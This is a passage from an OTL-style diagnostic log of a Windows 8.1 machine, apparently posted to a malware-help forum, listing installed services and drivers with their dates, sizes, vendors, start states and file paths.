SRV:[b]64bit:[/b] - [2014/10/29 10:57:05 | 000,324,608 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\BthHFSrv.dll -- (BthHFSrv)
SRV:[b]64bit:[/b] - [2014/10/29 10:48:20 | 000,166,400 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\NcaSvc.dll -- (NcaSvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:43:27 | 000,524,800 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicvss)
SRV:[b]64bit:[/b] - [2014/10/29 10:43:27 | 000,524,800 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmictimesync)
SRV:[b]64bit:[/b] - [2014/10/29 10:43:27 | 000,524,800 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicshutdown)
SRV:[b]64bit:[/b] - [2014/10/29 10:43:27 | 000,524,800 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicrdv)
SRV:[b]64bit:[/b] - [2014/10/29 10:43:27 | 000,524,800 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmickvpexchange)
SRV:[b]64bit:[/b] - [2014/10/29 10:43:27 | 000,524,800 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicheartbeat)
SRV:[b]64bit:[/b] - [2014/10/29 10:43:27 | 000,524,800 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicguestinterface)
SRV:[b]64bit:[/b] - [2014/10/29 10:27:21 | 000,013,312 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\smphost.dll -- (smphost)
SRV:[b]64bit:[/b] - [2014/10/29 10:26:21 | 000,838,656 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\netlogon.dll -- (Netlogon)
SRV:[b]64bit:[/b] - [2014/10/29 10:26:02 | 000,294,912 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\SystemEventsBrokerServer.dll -- (SystemEventsBroker)
SRV:[b]64bit:[/b] - [2014/10/29 10:24:37 | 000,131,072 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\ScDeviceEnum.dll -- (ScDeviceEnum)
SRV:[b]64bit:[/b] - [2014/10/29 10:22:40 | 000,062,464 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\keyiso.dll -- (KeyIso)
SRV:[b]64bit:[/b] - [2014/10/29 10:20:03 | 000,262,656 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\TimeBrokerServer.dll -- (TimeBroker)
SRV:[b]64bit:[/b] - [2014/10/29 10:19:20 | 000,550,912 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\netprofmsvc.dll -- (netprofm)
SRV:[b]64bit:[/b] - [2014/10/29 10:16:17 | 000,154,112 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\ncbservice.dll -- (NcbService)
SRV:[b]64bit:[/b] - [2014/10/29 10:13:24 | 000,374,784 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wcmsvc.dll -- (Wcmsvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:13:02 | 000,260,608 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\vaultsvc.dll -- (VaultSvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:12:36 | 000,407,040 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\das.dll -- (DeviceAssociationService)
SRV:[b]64bit:[/b] - [2014/10/29 10:12:22 | 000,270,336 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\bisrv.dll -- (BrokerInfrastructure)
SRV:[b]64bit:[/b] - [2014/10/29 10:11:10 | 001,639,424 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wlidsvc.dll -- (wlidsvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:09:48 | 000,521,728 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\GeofenceMonitorService.dll -- (lfsvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:05:09 | 000,206,848 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\DeviceSetupManager.dll -- (DsmSvc)
SRV:[b]64bit:[/b] - [2014/10/29 09:57:18 | 000,074,752 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\NcdAutoSetup.dll -- (NcdAutoSetup)
SRV:[b]64bit:[/b] - [2014/10/29 09:48:52 | 000,562,688 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\AppReadiness.dll -- (AppReadiness)
SRV:[b]64bit:[/b] - [2014/10/29 09:46:48 | 001,348,096 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\AppXDeploymentServer.dll -- (AppXSvc)
SRV:[b]64bit:[/b] - [2014/10/29 09:35:51 | 001,668,096 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\workfolderssvc.dll -- (workfolderssvc)
SRV:[b]64bit:[/b] - [2014/10/01 19:54:24 | 000,319,376 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Windows\SysNative\igfxCUIService.exe -- (igfxCUIService1.0.0.0)
SRV:[b]64bit:[/b] - [2012/08/14 18:03:42 | 000,027,792 | ---- | M] (VIA Technologies, Inc.) [Auto | Running] -- C:\Windows\SysNative\ViakaraokeSrv.exe -- (VIAKaraokeService)
SRV:[b]64bit:[/b] - [2012/06/19 19:10:34 | 000,634,632 | ---- | M] (Intel(R) Corporation) [Auto | Running] -- C:\Program Files\Intel\iCLS Client\HeciServer.exe -- (Intel(R)
SRV - [2015/04/15 01:48:07 | 000,268,464 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)
SRV - [2015/04/03 14:37:50 | 000,148,080 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)
SRV - [2015/02/18 19:11:32 | 000,315,488 | R--- | M] (Skype Technologies) [Auto | Stopped] -- C:\Program Files (x86)\Skype\Updater\Updater.exe -- (SkypeUpdate)
SRV - [2014/12/03 15:31:16 | 000,081,088 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice)
SRV - [2014/10/29 12:50:11 | 002,987,520 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\WINDOWS\system32\spool\drivers\x64\3\PrintConfig.dll -- (PrintNotify)
SRV - [2014/10/29 10:51:55 | 000,017,920 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\StorSvc.dll -- (StorSvc)
SRV - [2014/10/29 10:04:45 | 000,011,776 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\smphost.dll -- (smphost)
SRV - [2014/10/29 09:53:11 | 000,367,104 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\GeofenceMonitorService.dll -- (lfsvc)
SRV - [2014/10/01 19:54:28 | 000,281,488 | ---- | M] (Intel Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\IntelCpHeciSvc.exe -- (cphs)
SRV - [2014/08/14 07:30:50 | 000,833,728 | ---- | M] (Valve Corporation) [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Steam\SteamService.exe -- (Steam Client Service)
SRV - [2014/07/14 18:21:46 | 001,390,176 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe -- (c2cautoupdatesvc)
SRV - [2014/07/14 18:21:06 | 001,767,520 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe -- (c2cpnrsvc)
SRV - [2014/03/04 10:10:14 | 000,122,464 | ---- | M] (株式会社ネットビジョン) [On_Demand | Stopped] -- C:\Program Files (x86)\au Wi-Fi接続ツール\auWifiConnectSvc.exe -- (auWifiConnectSvc)
SRV - [2013/12/18 01:56:16 | 000,754,712 | ---- | M] (Google Inc.) [Auto | Running] -- C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaCacheService.exe -- (GoogleIMEJaCacheService)
SRV - [2013/04/04 14:50:32 | 000,701,512 | ---- | M] (Malwarebytes Corporation) [Auto | Running] -- C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe -- (MBAMService)
SRV - [2013/04/04 14:50:32 | 000,418,376 | ---- | M] (Malwarebytes Corporation) [Auto | Running] -- C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe -- (MBAMScheduler)
SRV - [2012/09/17 17:19:50 | 000,364,416 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe -- (UNS)
SRV - [2012/09/17 17:19:48 | 000,276,864 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe -- (LMS)
SRV - [2012/09/17 17:19:34 | 000,165,760 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe -- (jhi_service)
SRV - [2007/09/05 14:38:28 | 000,174,624 | ---- | M] () [Auto | Running] -- C:\Program Files (x86)\Siemens\Common\TangoCoreService.exe -- (TangoCoreService)


[color=#E56717]========== Driver Services (SafeList) ==========[/color]

DRV:[b]64bit:[/b] - [2015/03/04 19:25:11 | 000,377,152 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\clfs.sys -- (CLFS)
DRV:[b]64bit:[/b] - [2015/02/04 08:58:33 | 000,264,000 | ---- | M] (Microsoft Corporation) [File_System | Boot | Running] -- C:\Windows\SysNative\drivers\WdFilter.sys -- (WdFilter)
DRV:[b]64bit:[/b] - [2015/02/04 08:58:33 | 000,114,496 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\WdNisDrv.sys -- (WdNisDrv)
DRV:[b]64bit:[/b] - [2015/02/04 08:58:04 | 000,044,024 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\WdBoot.sys -- (WdBoot)
DRV:[b]64bit:[/b] - [2014/12/12 09:51:20 | 000,075,776 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\ahcache.sys -- (ahcache)
DRV:[b]64bit:[/b] - [2014/11/13 21:35:31 | 000,283,064 | ---- | M] (Disc Soft Ltd) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\dtsoftbus01.sys -- (dtsoftbus01)
DRV:[b]64bit:[/b] - [2014/10/29 12:59:47 | 000,415,040 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\spaceport.sys -- (spaceport)
DRV:[b]64bit:[/b] - [2014/10/29 12:59:12 | 000,136,512 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\wfplwfs.sys -- (WFPLWFS)
DRV:[b]64bit:[/b] - [2014/10/29 12:57:42 | 000,054,784 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\wpcfltr.sys -- (wpcfltr)
DRV:[b]64bit:[/b] - [2014/10/29 12:56:04 | 000,027,456 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\rdpvideominiport.sys -- (RdpVideoMiniport)
DRV:[b]64bit:[/b] - [2014/10/29 11:46:43 | 000,029,696 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbGD.sys -- (TsUsbGD)
DRV:[b]64bit:[/b] - [2014/10/29 11:46:41 | 000,057,856 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bthhfenum.sys -- (BthHFEnum)
DRV:[b]64bit:[/b] - [2014/10/29 11:46:09 | 000,087,040 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\netvsc63.sys -- (netvsc)
DRV:[b]64bit:[/b] - [2014/10/29 11:45:54 | 000,126,464 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\NdisImPlatform.sys -- (NdisImPlatform)
DRV:[b]64bit:[/b] - [2014/10/29 11:45:39 | 000,066,560 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mslldp.sys -- (MsLldp)
DRV:[b]64bit:[/b] - [2014/10/29 11:45:16 | 000,103,424 | ---- | M] (Microsoft Corporation) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\Ndu.sys -- (Ndu)
DRV:[b]64bit:[/b] - [2014/10/15 17:32:36 | 000,921,920 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\WINDOWS\SysNative\drivers\refs.sys -- (ReFS)
DRV:[b]64bit:[/b] - [2014/10/13 11:43:17 | 000,238,912 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\sdbus.sys -- (sdbus)
DRV:[b]64bit:[/b] - [2014/10/13 11:43:17 | 000,086,336 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\pdc.sys -- (pdc)
DRV:[b]64bit:[/b] - [2014/10/13 11:43:17 | 000,039,744 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\intelpep.sys -- (intelpep)
DRV:[b]64bit:[/b] - [2014/10/08 18:24:09 | 000,467,776 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\USBHUB3.SYS -- (USBHUB3)
DRV:[b]64bit:[/b] - [2014/10/07 15:54:45 | 000,324,928 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\USBXHCI.SYS -- (USBXHCI)
DRV:[b]64bit:[/b] - [2014/10/07 15:54:45 | 000,189,248 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\UCX01000.SYS -- (UCX01000)
DRV:[b]64bit:[/b] - [2014/10/07 15:44:39 | 000,069,952 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\vpci.sys -- (vpci)
DRV:[b]64bit:[/b] - [2014/10/01 19:54:16 | 003,828,152 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\igdkmd64.sys -- (igfx)
DRV:[b]64bit:[/b] - [2014/09/24 16:27:11 | 000,157,016 | ---- | M] (Microsoft Corporation) [File_System | Boot | Running] -- C:\WINDOWS\SysNative\drivers\wof.sys -- (Wof)
DRV:[b]64bit:[/b] - [2014/09/24 15:58:01 | 000,146,776 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SerCx2.sys -- (SerCx2)
DRV:[b]64bit:[/b] - [2014/09/24 15:57:48 | 000,175,960 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\VerifierExt.sys -- (VerifierExt)
DRV:[b]64bit:[/b] - [2014/09/24 15:57:47 | 000,079,192 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\sdstor.sys -- (sdstor)
DRV:[b]64bit:[/b] - [2014/09/24 15:57:47 | 000,057,176 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\stornvme.sys -- (stornvme)
DRV:[b]64bit:[/b] - [2014/09/24 15:57:47 | 000,033,280 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\BasicRender.sys -- (BasicRender)
DRV:[b]64bit:[/b] - [2014/09/24 15:29:18 | 000,037,216 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\terminpt.sys -- (terminpt)
DRV:[b]64bit:[/b] - [2014/08/15 09:36:55 | 000,146,752 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\msgpioclx.sys -- (GPIOClx0101)
DRV:[b]64bit:[/b] - [2014/08/02 05:18:33 | 000,038,296 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\intelaud.sys -- (intaud_WaveExtensible)
DRV:[b]64bit:[/b] - [2014/08/02 05:18:33 | 000,027,032 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\iwdbus.sys -- (iwdbus)
DRV:[b]64bit:[/b] - [2014/07/28 14:52:00 | 000,054,784 | ---- | M] (Apple, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\usbaapl64.sys -- (USBAAPL64)
DRV:[b]64bit:[/b] - [2013/08/22 22:25:40 | 000,043,008 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\condrv.sys -- (condrv)
DRV:[b]64bit:[/b] - [2013/08/22 22:25:40 | 000,030,048 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\WINDOWS\SysNative\drivers\fs_rec.sys -- (Fs_Rec)
DRV:[b]64bit:[/b] - [2013/08/22 21:50:19 | 000,057,696 | ---- | M] (Microsoft Corporation) [Kernel | System | Stopped] -- C:\Windows\SysNative\drivers\dam.sys -- (dam)
DRV:[b]64bit:[/b] - [2013/08/22 21:49:54 | 000,079,712 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\acpiex.sys -- (acpiex)
DRV:[b]64bit:[/b] - [2013/08/22 21:49:33 | 000,159,584 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\tpm.sys -- (TPM)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:49 | 000,063,840 | ---- | M] (Marvell Semiconductor, Inc.) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\mvumis.sys -- (mvumis)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:48 | 000,041,824 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\msgpiowin32.sys -- (msgpiowin32)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:45 | 003,357,024 | ---- | M] (Broadcom Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:45 | 000,093,536 | ---- | M] (LSI Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:45 | 000,082,784 | ---- | M] (LSI Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\lsi_sss.sys -- (LSI_SSS)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:45 | 000,064,352 | ---- | M] (Hewlett-Packard Company) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:44 | 000,081,760 | ---- | M] (LSI Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas3.sys -- (LSI_SAS3)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:41 | 000,782,176 | ---- | M] (PMC-Sierra) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\adp80xx.sys -- (ADP80XX)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:41 | 000,531,296 | ---- | M] (Broadcom Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:41 | 000,259,424 | ---- | M] (AMD Technologies Inc.) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:41 | 000,108,896 | ---- | M] (LSI) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\3ware.sys -- (3ware)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:41 | 000,079,200 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:40 | 000,114,016 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\EhStorTcgDrv.sys -- (EhStorTcgDrv)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:40 | 000,082,784 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\EhStorClass.sys -- (EhStorClass)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:40 | 000,025,952 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:34 | 000,305,504 | ---- | M] (VIA Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\VSTXRAID.SYS -- (VSTXRAID)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:33 | 000,074,080 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\uaspstor.sys -- (UASPStor)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:32 | 000,031,072 | ---- | M] (Promise Technology, Inc.) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:31 | 000,107,872 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\storahci.sys -- (storahci)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:31 | 000,072,032 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SpbCx.sys -- (SpbCx)
DRV:[b]64bit:[/b] - [2013/08/22 21:43:31 | 000,069,472 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SerCx.sys -- (SerCx)
DRV:[b]64bit:[/b] - [2013/08/22 21:39:15 | 000,026,976 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\uefi.sys -- (UEFI)
DRV:[b]64bit:[/b] - [2013/08/22 21:36:12 | 000,026,976 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WpdUpFltr.sys -- (WpdUpFltr)
DRV:[b]64bit:[/b] - [2013/08/22 20:39:31 | 000,050,688 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\BasicDisplay.sys -- (BasicDisplay)
DRV:[b]64bit:[/b] - [2013/08/22 20:39:20 | 000,022,016 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HyperVideo.sys -- (HyperVideo)
DRV:[b]64bit:[/b] - [2013/08/22 20:39:06 | 000,009,728 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mshidumdf.sys -- (mshidumdf)
DRV:[b]64bit:[/b] - [2013/08/22 20:38:58 | 000,010,752 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\acpitime.sys -- (acpitime)
DRV:[b]64bit:[/b] - [2013/08/22 20:38:48 | 000,010,240 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\acpipagr.sys -- (acpipagr)
DRV:[b]64bit:[/b] - [2013/08/22 20:38:39 | 000,036,992 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\BthAvrcpTg.sys -- (BthAvrcpTg)
DRV:[b]64bit:[/b] - [2013/08/22 20:38:26 | 000,019,456 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\kdnic.sys -- (kdnic)
DRV:[b]64bit:[/b] - [2013/08/22 20:38:23 | 000,011,264 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\vmgencounter.sys -- (gencounter)
DRV:[b]64bit:[/b] - [2013/08/22 20:38:22 | 000,023,040 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\npsvctrig.sys -- (npsvctrig)
DRV:[b]64bit:[/b] - [2013/08/22 20:38:16 | 000,030,720 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\BthhfHid.sys -- (bthhfhid)
DRV:[b]64bit:[/b] - [2013/08/22 20:37:49 | 000,013,824 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hyperkbd.sys -- (hyperkbd)
DRV:[b]64bit:[/b] - [2013/08/22 20:37:28 | 000,056,320 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbFlt.sys -- (TsUsbFlt)
DRV:[b]64bit:[/b] - [2013/08/22 20:37:28 | 000,041,472 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hidi2c.sys -- (hidi2c)
DRV:[b]64bit:[/b] - [2013/08/22 20:37:14 | 000,029,696 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\dmvsc.sys -- (dmvsc)
DRV:[b]64bit:[/b] - [2013/08/22 20:36:25 | 000,016,384 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\NdisVirtualBus.sys -- (NdisVirtualBus)
DRV:[b]64bit:[/b] - [2013/08/22 17:46:33 | 000,027,136 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\fxppm.sys -- (FxPPM)
DRV:[b]64bit:[/b] - [2013/08/13 08:25:46 | 000,017,624 | ---- | M] (Windows (R) Win 7 DDK provider) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bcmfn2.sys -- (bcmfn2)
DRV:[b]64bit:[/b] - [2013/08/10 09:39:30 | 000,651,248 | ---- | M] (Intel Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\iaStorAV.sys -- (iaStorAV)
DRV:[b]64bit:[/b] - [2013/08/06 15:13:30 | 000,023,040 | ---- | M] (Apple Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\netaapl64.sys -- (Netaapl)
DRV:[b]64bit:[/b] - [2013/07/31 03:47:35 | 000,024,568 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\iaLPSSi_GPIO.sys -- (iaLPSSi_GPIO)
DRV:[b]64bit:[/b] - [2013/07/26 04:05:39 | 000,099,320 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\iaLPSSi_I2C.sys -- (iaLPSSi_I2C)
DRV:[b]64bit:[/b] - [2013/06/18 23:44:59 | 000,129,224 | ---- | M] (Qualcomm Atheros Co., Ltd.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\L1C63x64.sys -- (L1C)
DRV:[b]64bit:[/b] - [2013/04/04 14:50:32 | 000,025,928 | ---- | M] (Malwarebytes Corporation) [File_System | On_Demand | Running] -- C:\Windows\SysNative\drivers\mbam.sys -- (MBAMProtector)
DRV:[b]64bit:[/b] - [2012/09/01 18:01:56 | 000,647,736 | ---- | M] (Intel Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\iaStorA.sys -- (iaStorA)
DRV:[b]64bit:[/b] - [2012/08/21 13:01:20 | 000,033,240 | ---- | M] (GEAR Software Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\GEARAspiWDM.sys -- (GEARAspiWDM)
